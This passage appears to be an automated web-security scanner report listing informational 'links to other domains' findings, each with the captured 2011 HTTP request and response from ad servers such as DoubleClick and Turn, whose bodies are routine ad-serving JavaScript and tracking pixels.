Host:   http://ad.doubleclick.net
Path:   /adj/fbn/markets

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/fbn/markets;comp=;s1=markets;s2=;pos=top5t;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=292x30;tile=5;u=10428%7C%7C%7C%7C%7Carticle%7Ctop5t%7Crecession%7Chenry-kravis%7Crjr-nabisco%7Cjunk-bonds%7Cpadma-lakshmi%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=504013981? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:38:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 878

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/r;235228623;0-0;2;22018236;13081-292/30;40856569/40874356/1;u=10428|||||article|top5t|recession|henry-kravis|
...[SNIP]...
292x30;tile=5;u=10428|||||article|top5t|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=%3fhttp://ad.doubleclick.net/clk;236880980;58880931;z"><img src="http://s0.2mdn.net/viewad/1585828/110854_02_Pricing_EII_None_292x30.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.6. http://ad.doubleclick.net/adj/fbn/markets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbn/markets

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/fbn/markets;comp=;s1=markets;s2=;pos=snapshot;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=292x30;tile=3;u=10428%7C%7C%7C%7C%7Carticle%7Csnapshot%7Crecession%7Chenry-kravis%7Crjr-nabisco%7Cjunk-bonds%7Cpadma-lakshmi%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C;!c=;ord=504013981? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:38:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 886

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/i;235228589;1-0;1;22018236;13081-292/30;41818979/41836766/1;u=10428|||||article|snapshot|recession|henry-krav
...[SNIP]...
x30;tile=3;u=10428|||||article|snapshot|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=%3fhttp://ad.doubleclick.net/clk;240261185;58880943;n"><img src="http://s0.2mdn.net/viewad/1585828/1-110062_01_GoPro_TTS_EII_292x30.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.7. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /server/ads.js?&pub=2137329&code=8842770&cch=8841762&l=300x250&tmz=-5&area=-1&res=1920&rnd=0.9122231449000537&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F&loc=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sat, 14 May 2011 11:39:23 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:22 GMT
Content-Length: 10227


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
="http://r.turn.com/r/formclick/id/YD_UEYO-LSRaWwYA9wEBAA/url/%chttp%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dbrd%26FlightID%3D2362495%26Page%3D%26PluID%3D0%26Pos%3D4970" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2362495&Page=&PluID=0&Pos=4970" border=0 width=300 height=250></a>
...[SNIP]...
<img border="0" src="http://r.turn.com/r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid="> \n                    <img height="1" width="1" style="border-style:none;" alt="" src="http://segments.adap.tv/data/?p=cadreon&type=gif&segment=11&add=true"/> \n                </span>
...[SNIP]...

19.8. http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.us.doubleclick.net
Path:   /adj/ftcom.5887.ftfm/private-equity

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adj/ftcom.5887.ftfm/private-equity;sz=468x60,728x90;dcopt=ist;14=usa;cn=nor;u=uuid=private-equity,ts=20110512060306;pos=banlb;tile=1;ord=1762542170472443? HTTP/1.1
Host: ad.us.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 382
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 12 May 2011 11:03:07 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.us.doubleclick.net/click;h=v8/3b05/0/0/%2a/d;225735041;22-0;3;52875020;3454-728/90;38296178/38313935/1;u=uuid=private-equity,ts=20110512060306;~aopt=2/1/29/0;~sscs=%3fhttp://www.fdiintelligence.com/ftoi"><img src="http://s0.2mdn.net/viewad/2803881/2991_fDiIntel_IPA_Leader1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.9. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pixel?&id=1095717&id=698998&id=1230057&id=1253950&id=1250690&id=1229700&id=915172&id=1198835&id=1239839&id=1266660&id=1255251&id=939942&id=1278096&id=1228264&id=1238288&id=1264716&id=1006907&id=1238467&id=1224511&id=1081668&id=1216952&id=956404&id=940005&id=1268278&id=1050626&id=1294447&id=950991&id=1283938&id=956405&id=1212821&id=1239555&id=992290&id=1238433&id=1212819&id=1094107&id=502881&id=1156121&id=1239571&id=939987&id=612033&id=1023063&id=1238971&id=1085597&id=1210932&id=1049055&id=1229727&id=1198834&id=1282674&id=1230109&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 11:39:30 GMT
Pragma: no-cache
Content-Length: 3659
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=n2ACCPDEggIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=2dBwCMDggwIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="https://www.googleadservices.com/pagead/conversion/1033191019/?label=mxelCP2b-gEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=uk38CIiX0QEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZIPUCNDXggIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=muhJCP2z9wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=WkdyCKXa-wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=nbI8CJjeggIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=yfh4CPjKgwIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=6gplCPXJ6wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=6L6cCMC7ggIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=RmcwCOXM6QEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=XFL7COWz7gEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=e-86CNDegwIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=0pAQCKDe0wEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=Dtp9CMW-4AEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=TUhzCKingwIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=ooGmCK2U7wEQ6_zU7AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3Nn5CODGggIQjPe59AM&amp;guid=ON&amp;script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZKywCJjtggIQjPe59AM&amp;guid=ON&amp;script=0" />');

19.10. http://admeld.adnxs.com/usersync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:39:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:39:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:33 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

19.11. http://ads.adsonar.com/adserving/getAds.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1517620&pid=2277767&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:08 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 14156


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td><iframe src="http://cdn.tacoda.at.atwola.com/an/qseg.html" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...

19.12. http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bloomberg.com
Path:   /adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83?http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&ALLTOP&SPNATOP&SPWWTOP&GENTOP&USTOP&OLYTOP&TOP&WWTOP&marketstatus1&& HTTP/1.1
Host: ads.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; __utma=30057196.790518761.1303930135.1303930135.1303930135.1; __utmv=30057196.|3=opt=no-opt=1,; rsi_segs=K05539_10529|K05539_10592; opt=no-opt

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8755
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'x24') {
document.write ('<A HREF="http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/1220895524/x24/default/empty.gif/72634857383032345a51594144454b2b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>');
}
if (position == 'x60') {
document.write ('<IFRAME id="x60_131253292" SRC="http://ad.amtk-media.com/iframe?spacedesc=2107090_1090554_300x600_1205077_2107090&target=_blank&@CPSC@=" WIDTH=300 HEIGHT=600 SCROLLING="No" FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0>\n');
document.write ('<SCRIPT SRC="http://ad.amtk-media.com/jscript?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/131253292/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2b"></SCRIPT>
...[SNIP]...
/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2bhttp://ad.amtk-media.com/click?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y" TARGET="_blank">\n');
document.write (' <IMG SRC="http://ad.amtk-media.com/image?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y" WIDTH=300 HEIGHT=600 ALT="Click Here" BORDER=0>\n');
document.write (' </A>
...[SNIP]...
/bloombergopt/news/sports/international/story/L44/542509375/x62/Bloomberg/3259246/3259246_1x1_bw-no-show-ad.gif.html/72634857383032345a51594144454b2b?__QUERY__" target="_blank"> \n');
document.write ('<img src="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/Bloomberg/3259246/1x1_bw-no-show-ad.gif/1288893078" border="0" \n');
document.write ('width="1" height="1" alt=""/>
</a> \n');
document.write ('\n');
}
if (position == 'x70') {
document.write ('<IFRAME id="x70_1587021916" SRC="http://ad.amtk-media.com/iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=" WIDTH=728 HEIGHT=90 SCROLLING="No" FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0>\n');
document.write ('<SCRIPT SRC="http://ad.amtk-media.com/jscript?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/1587021916/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2b"></SCRIPT>
...[SNIP]...
6/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2bhttp://ad.amtk-media.com/click?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y" TARGET="_blank">\n');
document.write (' <IMG SRC="http://ad.amtk-media.com/image?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y" WIDTH=728 HEIGHT=90 ALT="Click Here" BORDER=0>\n');
document.write (' </A>
...[SNIP]...
</script>\n');
}
if (position == 'x80') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
